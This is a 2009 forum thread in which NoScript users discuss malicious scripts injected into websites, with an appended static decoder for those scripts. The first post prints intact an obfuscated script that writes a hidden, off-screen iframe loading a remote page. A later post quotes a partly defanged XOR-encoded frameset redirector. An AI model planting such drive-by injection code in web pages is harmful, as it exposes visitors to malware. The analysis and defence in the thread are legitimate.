Need NoScript like never before....

General discussion about the NoScript extension for Firefox
therube
Ambassador
Posts: 7528
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Need NoScript like never before....

Post by therube » Thu Jun 18, 2009 8:28 pm

Nothing new there. Another day, another exploit.

Code: Select all

<script type="text/javascript">var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z114z110z119z46z107z122z47z105z110z100z101z120z46z112z104z112z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");var TEptzkmsBZolwWqWunem = "";for (var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=String.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)</script>


Google/Safe Browsing/stopbadware.org/FF looks to have an OK handle on this one.

Sun of a gun. Got redirected to Ask.com !

Again mentioned at AVAST, http://forum.avast.com/index.php?&topic=45133.0

Heh, because I'm messing with FF I've forgotten that it has this "Safe Web" stuff built-in.
I must say, while certainly not foolproof, this built-in FF stuff can go a long way to keeping the unwary safer.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1pre) Gecko/20090618 SeaMonkey/2.0b1pre

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Need NoScript like never before....

Post by Tom T. » Fri Jun 19, 2009 7:59 am

Another good reason not to use AOL or Adobe Reader, or if you *must* use Adobe, at least disable javascript support, and whatever other executable support they've added since I dumped it a long time ago.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard

luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Re: Need NoScript like never before....

Post by luntrus » Mon Jun 29, 2009 10:20 pm

Hi NoScript users,

Another reason to be grateful for having NS inside Fx or Flock. On the first link to the site below that I checked for malcode, I get this with Bad Stuff Detektor: (Level: 1) Url checked: (frame source)
hxtp://www.autopilotprofits.com/\+yt+\
Blank page / could not connect
No ad codes identified

And immediately it is BINGO- this is the (HEAVILY EDITED BY ME for security reasons) suspicious JS-code in question:

Code: Select all

^!--
window.status = ' ';.........
sdf = "iuuq$2@..vvv/rsurngu/bnl.bfh,cho.mxsd/bfh.kwl.q`bj`fd.fn^inldq`fd/iulm$2Gq`bj^he$2E4020$37`gg^he$2E0050";yt="";v*r length=sdf.length;for(i=0;i<length;i++){yt+=String.fromCh*rCode(sdf.ch*rCodeAt(i)^1);}yt=unesc*pe(yt);
document.writeln("<FR*MESET BORDER=\"0\" FR*MEBORDER=\"0\" FR*MESPACING=\"0\" R0WS=\"100%,0\\*\"^");
document.writeln("<frame fr*meBorder=\"0\" fr*meSpacing=\"0\" m*rginHeight=\"0\" marginWidth=\"0\" scrolling=\"yes\" n*me=\"m*ster\" noresize src=\""+yt+"\"^");
document.writeln(^\/FR*MESET^");
//--^

And webmasters?

You may have noticed that when you take down all your webpages from your server and put up backup-files there, this nasty trojan, known as JS-Redirector-V [Trj] will have reinfected your pages within the upcoming next 6 hours.

How to solve this problem?
Well this is easy peasy: change the ftp-server password. When you have done this, take all infected pages from the server and then change with the backup. Upload all and your trojan will be gone- your visitors can again safely visit your site! There are only a couple of av's that flag it, and NoScript to block it.

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Iron/3.0.189.0 Safari/531.0
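
Added example, not part of any post above: a static decoder for the two encodings quoted in this thread (the `z`-delimited character codes in the first post and the XOR-with-1 string in the third). It recovers the hidden markup as data without running it and flags the frame traits that make it invisible. The sample strings, the `example.invalid` hosts and all function names are constructed for illustration.

```javascript
// Static analysis only: the blob is treated as data, never eval'd or document.write()n.

// Style 1: decimal character codes joined by a one-letter delimiter ("z60z105...").
function decodeDelimitedCharCodes(blob, delimiter) {
  return blob
    .split(delimiter)
    .filter((tok) => /^\d+$/.test(tok)) // drops the empty token before the first delimiter
    .map((tok) => String.fromCharCode(Number(tok)))
    .join("");
}

// Style 2: every character XORed with 1, then percent-decoded.
function decodeXor1(blob) {
  const xored = Array.from(blob, (ch) => String.fromCharCode(ch.charCodeAt(0) ^ 1)).join("");
  try { return decodeURIComponent(xored); } catch (e) { return xored; } // keep raw if malformed
}

// Make a URL safe to paste into a report or forum post.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// List every frame/iframe in decoded markup with the reasons it would be invisible.
function hiddenFrameIndicators(html) {
  const hits = [];
  for (const m of html.matchAll(/<i?frame\b[^>]*>/gi)) {
    const tag = m[0];
    const reasons = [];
    if (/opacity\s*[:=]\s*0(?![.\d])/i.test(tag)) reasons.push("zero opacity");
    if (/(left|top)\s*:\s*-\d+px/i.test(tag)) reasons.push("off-screen offset");
    const src = (tag.match(/\bsrc\s*=\s*["']([^"']*)["']/i) || [])[1] || "";
    hits.push({ src: defang(src), reasons });
  }
  return hits;
}

// Constructed samples (not the payloads from the thread), encoded the same two ways.
const SAMPLE_HTML = '<iframe width="1" height="1" ' +
  'src="http://tracker.example.invalid/index.php" style="left:-500px; opacity:0"></iframe>';
const SAMPLE_BLOB = Array.from(SAMPLE_HTML, (c) => "z" + c.charCodeAt(0)).join("");
const SAMPLE_URL = "http://frames.example.invalid/a.html";
const SAMPLE_XOR = Array.from(encodeURIComponent(SAMPLE_URL),
  (c) => String.fromCharCode(c.charCodeAt(0) ^ 1)).join("");

console.log(hiddenFrameIndicators(decodeDelimitedCharCodes(SAMPLE_BLOB, "z")));
console.log(defang(decodeXor1(SAMPLE_XOR)));
```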
